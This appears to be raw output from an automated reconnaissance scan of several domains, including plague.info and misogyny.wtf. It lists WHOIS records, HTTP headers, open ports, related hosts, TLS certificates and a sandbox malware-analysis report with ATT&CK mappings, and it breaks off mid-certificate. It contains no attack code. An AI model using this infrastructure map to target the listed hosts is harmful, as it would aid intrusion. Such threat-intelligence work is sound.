00:00:85:F5:03:9F) 37.7803446,-122.3906132 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77ab5816ee75632a-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.96.1 2022-12-18 00:03:02 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.101 90.116.166.104 2022-12-18 00:17:08 Co-Hosted Site - Domain Name No SSL Certificate Analyzer 0 0 2 0 None amen.fr webmail.zerotwo-best-waifu.online 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None clumsydarkchords.88838.repl.co 34.149.204.188 2022-12-18 00:25:42 Affiliate - Internet Name No DNS Resolver 0 0 4 0 None lfbn-nic-1-313-190.w90-116.abo.wanadoo.fr 90.116.149.190 2022-12-18 00:11:11 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.info Registry Domain ID: c6b55818519e49ffbd1c2a329f4bac56-DONUTS Registrar WHOIS Server: whois.godaddy.com/ Registrar URL: http://www.godaddy.com/domains/search.aspx?ci=8990 Updated Date: 2022-11-05T16:53:15Z Creation Date: 2001-09-21T16:52:34Z Registry Expiry Date: 2023-09-21T16:52:34Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Domains By Proxy, LLC Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Arizona Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: mona.ns.cloudflare.com Name Server: mario.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:11Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. plague.info 2022-12-18 00:04:04 Raw Data from RIRs No Tool - WhatWeb 0 0 1 0 None [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://misogyny.wtf', u'http_status': 200, u'plugins': {u'Python': {u'version': [u'3.9.11']}, u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'Werkzeug/2.2.2 Python/3.9.11']}, u'Werkzeug': {u'version': [u'2.2.2']}, u'IP': {u'string': [u'20.226.83.185']}}}, {}] misogyny.wtf 2022-12-18 00:09:02 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.1:8443 188.114.97.1 2022-12-18 00:12:35 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://188.114.97.3/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.97.3/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.97.3/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b40_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b40_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_b40_ConnHashTable<2880>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_b40_IESQMMUTEX_0_303"\n "IsoScope_b40_IE_EarlyTabStart_0xcc4_Mutex"\n "IsoScope_b40_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2880"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b40_IESQMMUTEX_0_303"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.97.3:80"\n "104.18.31.78:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "63CJVUP7.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\63CJVUP7.txt]- [targetUID: 00000000-00002832]\n Dropped file: "LM0USI2F.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LM0USI2F.txt]- [targetUID: 00000000-00002880]\n Dropped file: "T1YFWYTS.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T1YFWYTS.txt]- [targetUID: 00000000-00002880]\n Dropped file: "I9G9J455.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I9G9J455.txt]- [targetUID: 00000000-00002832]\n Dropped file: "V5D4L4LK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V5D4L4LK.txt]- [targetUID: 00000000-00002880]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "63CJVUP7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\63CJVUP7.txt]- [targetUID: 00000000-00002832]\n "LM0USI2F.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LM0USI2F.txt]- [targetUID: 00000000-00002880]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "RecoveryStore._5A1BB117-765D-11ED-9E1F-08002767FB39_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF6DA808881895FA0D.TMP" has type "data"- Location: [%TEMP%\\~DF6DA808881895FA0D.TMP]- [targetUID: 00000000-00002880]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "main_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_62DCD38E-765D-11ED-9E1F-08002767FB39_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "T1YFWYTS.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T1YFWYTS.txt]- [targetUID: 00000000-00002880]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002880]\n "_5A1BB119-765D-11ED-9E1F-08002767FB39_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF6F835D267B734551.TMP" has type "data"- Location: [%TEMP%\\~DF6F835D267B734551.TMP]- [targetUID: 00000000-00002880]\n "~DF5D1A299F27A3DE5A.TMP" has type "data"- Location: [%TEMP%\\~DF5D1A299F27A3DE5A.TMP]- [targetUID: 00000000-00002880]\n "I9G9J455.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I9G9J455.txt]- [targetUID: 00000000-00002832]\n "V5D4L4LK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V5D4L4LK.txt]- [targetUID: 00000000-00002880]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF0964BBE9D2996453.TMP" has type "data"- Location: [%TEMP%\\~DF0964BBE9D2996453.TMP]- [targetUID: 00000000-00002880]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://188.114.97.3/"\n Pattern match: "http://188.114.97.3"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.97.3/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "188.114.97.3" found in string "http://188.114.97.3/"\n Potential IP "188.114.97.3" found in string "http://188.114.97.3"\n "188.114.97.3"\n Potential IP "188.114.97.3" found in string "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 188.114.97.3\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'2/92 Antivirus vendors marked sample as malicious (2% detection rate)'}], u'threat_level': 1, u'size': None, u'job_id': u'6390e9ccb71c6170ee5b000d', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'suspicious_identifiers': [], u'attck_id': u'T1071.001', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Web Protocols', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mit 188.114.97.3 2022-12-18 00:27:10 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.48.101:80 81.88.48.101 2022-12-18 00:07:05 HTTP Status Code No Web Spider 0 0 2 0 None None http://zerotwo-best-waifu.online/778112985743251/wap/dsc_injection" 2022-12-18 00:14:31 Physical Location No ipstack 0 0 2 0 None Colombia 188.114.96.9 2022-12-18 00:14:32 Country No Country Name Extractor 0 0 3 0 None United States +19854014545 2022-12-18 00:13:27 Affiliate - Email Address No E-Mail Address Extractor 0 0 2 0 None abuse@namecheap.com Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:22:37 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.nl plague.fun 2022-12-18 00:03:05 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun [{u'pubkey_sha256': u'eed16361070909e64009401f21e37cfc30dd63ff7c8f701bfc59a6437ea80bc8', u'revoked': False, u'not_after': u'2023-01-04T20:16:47Z', u'id': u'4267275535', u'cert': {u'data': u'MIIEWzCCA0OgAwIBAgISBEOkfSkfFQ5rrIbkS8C+aXGpMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMjEwMDYyMDE2NDhaFw0yMzAxMDQyMDE2NDdaMBoxGDAWBgNVBAMTD2hvb2sucGxhZ3VlLmZ1bjBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABPBtnT5l4ifn+eexQ12bnHGjdIeKYMh/KScMO3AYDmX/4uRsspNtM2FqvzhPBc1bLkkYDMUyXqb4E5KiVBUg8bijggJMMIICSDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFC1yCZkaF0sQg2Dm6zDyUVb2RUvEMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMBoGA1UdEQQTMBGCD2hvb2sucGxhZ3VlLmZ1bjBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQYGCisGAQQB1nkCBAIEgfcEgfQA8gB3AN+lXqtogk8fbK3uuF9OPlrqzaISpGpejjsSwCBEXCpzAAABg68od9cAAAQDAEgwRgIhALaVt8ccgCv9ekEt0e4r8AzH1a1KyeAl8WE6QvTHmCO8AiEAsIxy8E+K6Gzp9jQ5IpY8xf+bhGNxzWJ0LSW2XYIHgAAAdwBvU3asMfAxGdiZAKRRFf93FRwR2QLBACkGjbIImjfZEwAAAYOvKHj6AAAEAwBIMEYCIQDagacz+4T5i+hZZ1qzu30jThPGH+7MEcqQ2cfCuIQsLQIhAKVGwH50llOfCZwMCuWmQ7G73k+aFP/KPnEdBlFyTwqgMA0GCSqGSIb3DQEBCwUAA4IBAQBVWuXU/MGRl/xiv+d9q79eKq3Eojjmk4U4tx3T3jIO4kyZTREnCG7Jh2uGcWNSSG+Xgdb509wwajFx+VBypVxZ/HMp0Lg4eidBszgxgFt0iEBcURMpukGrSafo6KEEFYvTwwI6MQiBLqLiQZz1fPFYvexM2Q/nw3Jy3h9QZhcj5d+1Nkle4a8XddkYVJSt4K44rCwJxQEbjzJtfDg+LU8N92T9iXrwQmYUpSayK88UuhAvzK/Qt7p6KXPU88GB/rQpO8ZLVsgZ0jrVcxwTc89ZovPhJuWO/gRAOzFPhNTR8cqlocKfMfRU4v5QSkBxFff/d12iRYKeGb5SqSGFTkHi', u'sha256': u'8841f6cbb8d7c763c61eaa51603a73de43f3a7e57f918aadcf54ea83ea9981a5', u'type': u'cert'}, u'dns_names': [u'hook.plague.fun'], u'tbs_sha256': u'deab41fcd6c330e25320ba419acf0e610bcbe18370b6f3da2b9bbc84eecf29f2', u'not_before': u'2022-10-06T20:16:48Z', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'd6a99ccd0f59c65dd8b49943f7211883117fe3f0254976c963bc69fce14753a7', u'revoked': False, u'not_after': u'2023-01-21T15:38:17Z', u'id': u'4332304429', u'cert': {u'data': u'MIIEVjCCAz6gAwIBAgISBNDRocx8IO3rAfyF3UXM5RvaMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMjEwMjMxNTM4MThaFw0yMzAxMjExNTM4MTdaMBkxFzAVBgNVBAMTDmFwaS5wbGFndWUuZnVuMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMMC/IqADl3zzjBcMU4AgtPYTI7nvNYlE8OL8SA32TvsrUG7+0OMfXUuJn5xjMwQLCUKG7wInaDr6Zq16HEvl8aOCAkgwggJEMA4GA1UdDwEB/wQEAwIHgDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH/BAIwADAdBgNVHQ4EFgQUBONyUoTZR/+nJYu+VSpNWYbfPnUwHwYDVR0jBBgwFoAUFC6zF7dYVsuuUAlA5h+vnYsUwsYwVQYIKwYBBQUHAQEESTBHMCEGCCsGAQUFBzABhhVodHRwOi8vcjMuby5sZW5jci5vcmcwIgYIKwYBBQUHMAKGFmh0dHA6Ly9yMy5pLmxlbmNyLm9yZy8wGQYDVR0RBBIwEIIOYXBpLnBsYWd1ZS5mdW4wTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYQFtZtpAAAEAwBHMEUCIQCp3T4ZPQhHX5uxkKvCreKRBe/vlZkjnhK7GMXymCx//wIgMGlCijQYaOjh9OTZlM/FNO85GkPZnEeOQRAsbzog4+EAdQDoPtDaPvUGNTLnVyi8iWvJA9PL0RFr7Otp4Xd9bQa9bgAAAYQFtZ1UAAAEAwBGMEQCIFi5sYzNQ9YdgzwRA2cobKEzU7a50+9wrCxVWHEuhmu1AiB54W4Deh0nyc+IfwonG6yh/P/R62Of8KKD8IxDfTWVPjANBgkqhkiG9w0BAQsFAAOCAQEAs44OGJMOyxSFUzh